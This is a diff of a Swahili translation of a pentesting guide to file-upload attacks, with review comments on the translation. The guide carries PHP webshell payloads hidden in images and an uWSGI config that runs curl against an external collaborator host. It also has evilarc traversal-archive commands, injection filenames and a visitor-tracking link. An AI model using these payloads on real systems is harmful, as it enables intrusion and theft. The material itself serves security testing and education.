@ -31,7 +31,7 @@ Extensions nyingine muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita vizingiti kwa **kudanganya parser ya extension** upande wa server kwa mbinu kama **kuzidisha** **extension** au **kuongeza data taka** (bytes **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo awali kutayarisha payload bora._
4. Jaribu kupita ulinzi kwa **kufinya extension parser** upande wa server kwa mbinu kama **kuzidisha** extension au **kuongeza data chafu** (byte za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa awali kutengeneza payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
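Review bot: `kufinya extension parser` (squeezing the parser) loses the meaning of the deleted `kudanganya` (fooling the parser), and `data chafu` (dirty data) for junk data is less clear than `data taka`; prefer the earlier wording for both. `kupita ulinzi` is fine, but the bold markers in `**kuzidisha** extension` now cover only the verb, whereas the deleted line also bolded `extension`.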
@ -40,13 +40,13 @@ Extensions nyingine muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliopita:
5. Ongeza **safu nyingine ya extensions** kwa ukaguzi uliopita:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **exec extension before the valid extension** na kuomba server iwe misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Jaribu kuweka **extension ya utekelezaji kabla ya extension halali** na uombe kuwa server imepangwa vibaya. (inafaa kutumiwa kwenye misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini **si lazima kiishie kwa .php**, kitatekeleza code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Mfano wa **::$data** pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya mfano huu pia inaweza kusaidia kupita vizingiti zaidi (mfano. "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Tumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi kolon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Kama matokeo, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kusaidia kupita vikwazo zaidi (.mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
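Review bot: the ADS step reads `baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa` (after the allowed extension and before the allowed one) in both versions, which is self-contradictory; the example `file.asax:.jpg` puts the colon after the forbidden extension and before the permitted one, so the first occurrence should be `isiyoruhusiwa`. Also `(.mfano "file.asp::$data.")` has a stray leading dot, and `"**::$data**”` opens with a straight quote and closes with a curly one.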
@ -61,11 +61,11 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers huondoa au ku-normalize nukta zilizofuatia kwenye jina la faili lililosalazwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
Baadhi ya upload handlers hupunguza au kuwa-normalize herufi za dot mwishoni kutoka kwenye jina la faili lililosajiliwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server huondoa nukta ya mwisho na kusababisha `shell.php` kuendelea kuwepo, ambayo itaendeshwa ikiwa imewekwa kwenye directory inayotumika kuwahudumia mtandao (default public storage like `/storage/files/`).
- Kutumia MIME ya picha halali na magic header (kwa mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na dot, mfano, `shell.php.`.
- Server huondoa dot ya mwisho na kuhifadhi `shell.php`, ambayo itatekelezwa ikiwa itawekwa kwenye directory inayotumika kwa web (default public storage kama `/storage/files/`).
Minimal PoC (Burp Repeater):
```http
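Review bot: `kuwa-normalize` is a malformed verb and `lililosajiliwa` (registered) does not convey "persisted"; the mitigation bullets in the next hunk use `jina la faili lililohifadhiwa`, so use that here too (e.g. `huondoa au ku-normalize dot za mwishoni kwenye jina la faili lililohifadhiwa`). `UniSharps` is missing its apostrophe in both versions.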
@ -85,37 +85,37 @@ Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Lazimisha allowlists kali upande wa server na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyoweza kutekelezwa.
- Upgrade unisharp/laravel-filemanager to ≥ 2.9.1.
- Lazimisha allowlists kali za server-side na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyo-executable.
### Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kumdanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au pia unaweza **kuingiza payload moja kwa moja** ndani ya picha:\
`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression** inaongezwa kwenye picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu za hapo awali hazitakuwa na manufaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** ya **image**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kuunda payload inayoweza **kuishi baada ya image resizing**, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Other Tricks to check
- Tafuta udhaifu wa **kubadilisha jina** (rename) kwa faili iliyopakuliwa tayari (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- **Uwezekano wa ufunuo wa taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati ule ule**) **faili ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **file** au **folder** ambayo **tayari ipo**
3. Kupakia faili yenye **"." , ".." , au "…" kama jina lake**. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina "." itaumba faili inayoitwa "uploads" katika directory ya "/www/".
4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` ndani ya jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina **yaleyalo yaliyohifadhiwa** (reserved/forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia **kuupload executable** (.exe) au **.html** (inayoonekana kidogo) ambayo **itaweza kutekeleza code** inapofunguliwa kwa bahati mbaya na mhusika.
- Pata udhaifu wa **rename** faili iliyopakiwa (kubadilisha extension).
- Pata udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- **Possible Information disclosure**:
1. Pakia faili ile ile **mara nyingi** (na kwa **wakati mmoja**) zikiwa na **jina lile lile**.
2. Pakia faili yenye jina la faili au folda ambayo **tayari ipo**.
3. Kupakia faili yenye jina '.' , '..' , au '...' kama jina lake. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina '.' itaunda faili inayoitwa "uploads" katika "/www/" directory.
4. Pakia faili ambayo huenda isifutike kwa urahisi kama **'...:.jpg'** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoshindikana kuwa hatari) ambayo ita- execute code wakati mwathiriwa atakapoifunua kwa bahati mbaya.
### Special extension tricks
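Review bot: `Upgrade unisharp/laravel-filemanager to ≥ 2.9.1.` is left in English inside the translated mitigation list even though the deleted line already had `Sasisha … hadi ≥ 2.9.1`, and the Content-Type, magic-number, PLTE, IDAT and tEXt bullets replace Swahili text with English, so this hunk partly reverts the translation; confirm which side is meant to survive. In the information-disclosure list the invalid-characters set `|<>*?”` uses a curly closing quote in both versions; the reserved Windows character is the straight `"`. `inayoshindikana kuwa hatari` reads as "impossible to be dangerous" for "(less suspicious)"; the deleted `inayoonekana kidogo` was closer to the meaning.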
@ -128,17 +128,17 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML katika `$JETTY_BASE/webapps/` na tarajia shell!
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities zinaweza kutumiwa kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kuingiza yaliyomo ya faili. Miongoni mwa schemes zinazotumiwa kwenye uWSGI, scheme ya "exec" ni yenye nguvu kabisa, ikiruhusu kusoma data kutoka kwenye standard output ya process. Kipengele hiki kinaweza kutumika kwa malengo mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapotambuliwa.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Tazama mfano ufuatao wa `uwsgi.ini` yenye madhara, ikionyesha schemes mbalimbali:
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
```ini
[uwsgi]
; read from a symbol
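Review bot: the Jetty sentence keeps its first clause in English in both versions (`If you can upload a XML file into a Jetty server you can obtain …`), the uWSGI paragraph and the `Consider the following example of a harmful uwsgi.ini file` lead-in appear only on the English side, and the hunk context `The .inc extension is sometimes used for php files…` is also still untranslated. Make sure the Swahili versions are the ones that land in the file.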
@ -156,15 +156,15 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hutokea wakati wa kuchambua faili ya configuration. Ili configuration ianzishwe na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (inawezekana baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa kwa auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinakokota (reload) faili kwa interval zilizobainishwa inapogundua mabadiliko.
Utekelezaji wa payload hutokea wakati wa kuchanganua faili ya usanidi. Ili usanidi uanze na uchanganywe, mchakato wa uWSGI lazima uanzishwe upya (potentially after a crash or due to a Denial of Service attack) au faili lazima iwe imewekwa kwenye auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyowekwa baada ya kugundua mabadiliko.
Ni muhimu kuelewa unyenyekevu wa namna uWSGI inavyokagua faili zake za configuration. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa uwezekano wa exploitation.
Ni muhimu kuelewa upole wa jinsi uWSGI inavyochanganua faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), hivyo kupanua zaidi wigo la uwezekano wa matumizi mabaya.
## **wget File Upload/SSRF Trick**
## **wget Kupakia Faili/SSRF Triki**
Kuna wakati unaweza kugundua kwamba server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba faili zinazoruhusiwa pekee ndizo zitakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuepukika.**\
Katika baadhi ya matukio unaweza kugundua kwamba server inatumia **`wget`** kupakua **mafayili** na unaweza **kutaja** **URL**. Katika kesi hizi, code inaweza kukagua kwamba extension ya mafaili yaliyopakuliwa iko kwenye whitelist ili kuhakikisha kwamba mafaili yanayoruhusiwa pekee ndio yatakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Urefu wa **kiasi cha juu** wa **jina la faili** kwenye **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** herufi. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **vuka** **ukaguzi** (kama katika mfano huu **".gif"** ni extension **halali**) lakini `wget` ata **badilisha jina** la faili kuwa **"A"\*232+".php"**.
Urefu wa **jina la faili** katika **linux** ni **255**, hata hivyo, **wget** inakata majina ya faili hadi **236** herufi. Unaweza **kupakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili litatoka kwenye **ukaguzi** (kwa mfano hapa **".gif"** ni extension halali) lakini `wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
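Review bot: the rewritten uWSGI paragraph leaves `(potentially after a crash or due to a Denial of Service attack)` in English; `uchanganywe` (be mixed) should be `uchanganuliwe` (be parsed); `hurudisha faili` (returns the file) should express reloading (`hupakia faili upya`); and `wigo la` needs the agreeing `wigo wa`. In the wget paragraph the new line drops "maximum" (`Urefu wa **jina la faili** katika **linux** ni **255**`); keep the qualifier (`urefu wa juu`), since the whole point is the 255-byte filename limit versus wget's 236-character truncation.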
@ -187,17 +187,17 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Kumbuka kuwa **chaguo jingine** unachoweza kuwa unafikiria ili kuepuka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorejelewa iliyo na jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa kwa **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejelewa kwa jina la faili lililoonyeshwa kwenye URL ya awali**.
Kumbuka kwamba **chaguo jingine** unaloweza kufikiriwa nalo kuzunguka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itaingia bila kukaguliwa kisha wget itapakua faili iliyorejeshwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejeshwa kwa jina la faili lililoonyeshwa kwenye URL ya asili**.
## Zana
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mechanisms za file upload. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kushambulia vunjo, ikihakikisha tathmini ya kina ya web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia vulnerabilities, kuhakikisha tathmini ya kina ya web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda kwa ajili ya kuforgesha muundo wa `_FILES`. Kutokana na kutokuwepo kwa ulinganifu na kukatwa katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodai muundo thabiti (mfano, kuitwa multi-file upload na kuchukua matawi yasiyo salama). Ingawa ni niche leo, muundo huu wa “index corruption” mara nyingi hujitokeza tena katika CTFs na codebases za zamani.
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au njia kama hiyo kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda muundo wa `_FILES`. Kutokana na kutokamilika na kukatwa kwa tabia ya `snprintf()`, upload moja iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (kwa mfano, kuitenda kama multi-file upload na kuchukua matawi hatarishi). Ingawa ni niche leo, muundo huu wa “index corruption” mara kwa mara hujitokeza tena katika CTFs na codebases za zamani.
## From File upload to other vulnerabilities
## Kutoka File upload hadi vulnerabilities nyingine
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
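Review bot: `unaloweza kufikiriwa nalo` is ungrammatical, and `itaingia bila kukaguliwa` (will get in without being checked) misstates the mechanism: the original URL passes the extension check (`itapita ukaguzi`, as the deleted line says) and wget then stores the redirected content under the original filename unless `--trust-server-names` is set. The two bullets under `## Kutoka File upload hadi vulnerabilities nyingine` (`Set **filename** to …`) remain in English.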
@ -209,13 +209,13 @@ Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza kuagiza web server ichukue picha kutoka kwa URL unaweza kujaribu kutumika kwa SSRF. Ikiwa picha hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- PDFs zilizotengenezwa kwa njia maalum kuelekea XSS: Ukurasa ufuatao unaelezea jinsi ya **kuingiza data ya PDF ili kupata utekelezaji wa JS** (the [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md)). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS yoyote kwa kufuata maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **size limit** wakati wa kupakia faili
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya vitu unavyoweza kufanikisha kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
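Review bot: the Swahili SSRF bullet drops the link to the SSRF page (`[SSRF](../ssrf-server-side-request-forgery/index.html)`) that the English line carries; keep the link when translating. The PDF bullet duplicates its clause, once in Swahili and again in English inside parentheses (`… kupata utekelezaji wa JS** (the [following page present how to …`); keep one copy, with the link. `Hapa kuna orodha ya top 10 …` versus `Here's a top 10 list …` is another spot where the English side appears to replace the Swahili one.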
@ -240,34 +240,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za filetypes.
Rejea kwa [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa filetypes nyingine.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya mambo 2:
Ikiwa unaweza kupakia ZIP itakayofinyangwa ndani ya server, unaweza kufanya mambo 2:
### Symlink
Pakia link inayojumuisha soft links kwenda kwa faili nyingine, kisha, ukiingia kwenye faili zilizofunguliwa utapata faili zilizounganishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Dekompresi katika folda tofauti
### Decompress katika folda tofauti
Uundaji usiotarajiwa wa faili katika saraka wakati wa dekompresi ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu unaweza kulinda dhidi ya utekelezaji wa amri za OS kupitia upakiaji wa faili zenye madhara, msaada wa compression yenye muundo wa hieraki na uwezo wa directory traversal wa muundo wa ZIP unaweza kutumiwa. Hii inawawezesha wadukuzi kupitisha vikwazo na kutoroka kutoka kwa saraka salama za upload kwa kudanganya utendakazi wa dekompresi wa programu lengwa.
Uundaji usiotarajiwa wa faili kwenye saraka wakati wa decompress ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za OS-level kupitia upakiaji wa faili zenye madhara, msaada wa compression wa kihierarkia na uwezo wa directory traversal wa muundo wa archive wa ZIP unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka katika saraka za upakiaji salama kwa kudhibiti utendaji wa decompression wa programu inayolengwa.
An automated exploit to craft such files is available at [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). The utility can be used as shown:
Exploit iliyotautomatiiza ya kutengeneza faili kama hizi inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama inavyoonyeshwa:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, chaguo la **symlink trick with evilarc** pia liko. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kuwa evilarc haitakutana na makosa wakati wa uendeshaji wake.
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa utekelezaji wake.
Hapa chini kuna mfano wa Python code inayotumika kuunda faili ya zip yenye madhara:
Chini kuna mfano wa Python code unaotumika kuunda zip file ya hatari:
```python
#!/usr/bin/python
import zipfile
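Review bot: the PNG signature in the unchanged context line, `\0\x03H\0\x s0\x03["`, contains a stray space inside an escape (`\x s0`) and would not parse as a byte string; worth a follow-up fix. `itakayofinyangwa` (moulded, kneaded) does not mean decompressed, and the deleted `itafunguliwa` was right; `Exploit iliyotautomatiiza` is garbled (`exploit ya kiotomatiki` or `iliyo-automated`). The symlink bullet also goes from Swahili to English (`Upload a link containing soft links to other files …`), the opposite direction from the evilarc paragraph right below it.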
@ -285,11 +285,11 @@ zip.close()
create_zip()
```
**Kunyanyasa kompresi kwa file spraying**
**Kunyanyasa compression kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
1. **Kuunda PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
```php
<?php
